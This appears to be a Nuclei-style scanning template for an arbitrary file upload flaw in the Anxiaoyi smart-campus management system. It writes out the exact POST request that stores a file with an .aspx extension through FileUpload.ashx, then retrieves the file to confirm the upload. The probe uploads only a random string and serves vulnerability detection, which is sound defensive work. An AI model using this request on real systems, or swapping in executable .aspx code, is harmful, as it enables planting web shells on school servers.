id: anxiaoyi-FileUpload-upload

info:
  name: 智慧校园(安校易)管理系统 FileUpload.ashx 文件上传漏洞
  author: anxiaoyi
  severity: high
  tags: anxiaoyi

http:
  - raw:
      - |
        POST /Tool/FileUpload.ashx?action=PhotoByte&ext=1.aspx HTTP/1.1
        Host: {{Hostname}}
        Accept-Encoding: gzip
        Connection: keep-alive
        Content-Type: application/x-www-form-urlencoded
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/865.3 Safari/537.36

        {{randstr}}

      - |+
        GET /upload{{paths}} HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
        Accept-Encoding: gzip, deflate

    extractors:
      - type: regex
        part: body
        name: paths
        regex:
          - '/upload(.*?\.aspx)'
        internal: true
        group: 1

    matchers:
      - type: status
        status:
          - 200
      - type: word
        part: body_2
        words:
          - '{{randstr}}'
    matchers-condition: and
